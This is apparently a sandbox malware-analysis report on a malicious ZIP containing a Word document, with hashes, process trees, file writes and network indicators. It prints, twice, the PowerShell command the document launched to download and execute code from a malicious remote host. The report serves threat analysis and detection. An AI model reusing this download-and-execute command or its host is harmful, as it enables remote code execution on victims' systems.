File name: | Scan249315 (1).zip |
Full analysis: | https://app.any.run/tasks/6ab12ca2-f75b-4985-be9f-8ee0b3eadbec |
Verdict: | Malicious activity |
Analysis date: | October 14, 2019, 08:27:02 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 65580BA4C241949D65DB4925655C4AEF |
SHA1: | EE3CB62BC0B85CE274A8F415AABD2A89FC994120 |
SHA256: | 9F8564E259D0806DA5B4D91376B4BA618982B8E611560110CACCF215671A91C9 |
SSDEEP: | 3072:WGZnAeUvLu3HlT9pcWycwdtQNclQfIkIqWDEcAbmcMG6pMFey:pZGLu3lpphhwoNcl4bIqWDEcAKc+MFZ |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | Nuovo_documento_43.doc |
---|---|
ZipUncompressedSize: | 11534337 |
ZipCompressedSize: | 153048 |
ZipCRC: | 0xa6f462dc |
ZipModifyDate: | 2019:10:14 09:45:00 |
ZipCompression: | Deflated |
ZipBitFlag: | - |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
392 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Scan249315 (1).zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
1584 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa392.15431\Nuovo_documento_43.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3928 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://abby.abbyehughes.com/?need=stafhxt&vid=dpec10&17528')); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2208 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa392.17214\Nuovo_documento_43.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3316 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://abby.abbyehughes.com/?need=stafhxt&vid=dpec10&17528')); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
392 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa392.15431\Nuovo_documento_43.doc | — | |
MD5:— | SHA256:— | |||
1584 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDBB4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PWHHEYLBE75R3G54STGV.temp | — | |
MD5:— | SHA256:— | |||
392 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa392.17214\Nuovo_documento_43.doc | — | |
MD5:— | SHA256:— | |||
2208 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1FD2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NSD500NSWFXVVDB8EJXX.temp | — | |
MD5:— | SHA256:— | |||
1584 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIa392.15431\~$ovo_documento_43.doc | pgc | |
MD5:7592C5E491A0BF4C6BA753FF160A1492 | SHA256:5F5A1E67C5CE9A21218D98E3FFC14C57C9E230A017E5FD68B56A515A35E4C722 | |||
1584 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:AD647D762F093FD5E2A4465D862F41AE | SHA256:CE8E448C25F5FD10B8E29D22803CF7089914A1F1AFAEBF77A47E5CA36506BED8 | |||
3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:35375F3D71AE42AA9777154D256B33BF | SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF | |||
1584 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIa392.17214\~$ovo_documento_43.doc | pgc | |
MD5:7592C5E491A0BF4C6BA753FF160A1492 | SHA256:5F5A1E67C5CE9A21218D98E3FFC14C57C9E230A017E5FD68B56A515A35E4C722 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3316 | powershell.exe | GET | — | 185.189.151.22:80 | http://abby.abbyehughes.com/?need=stafhxt&vid=dpec10&17528 | CH | — | — | malicious |
3928 | powershell.exe | GET | — | 185.189.151.22:80 | http://abby.abbyehughes.com/?need=stafhxt&vid=dpec10&17528 | CH | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3928 | powershell.exe | 185.189.151.22:80 | abby.abbyehughes.com | SOFTplus Entwicklungen GmbH | CH | malicious |
3316 | powershell.exe | 185.189.151.22:80 | abby.abbyehughes.com | SOFTplus Entwicklungen GmbH | CH | malicious |
Domain | IP | Reputation |
---|---|---|
abby.abbyehughes.com |
| malicious |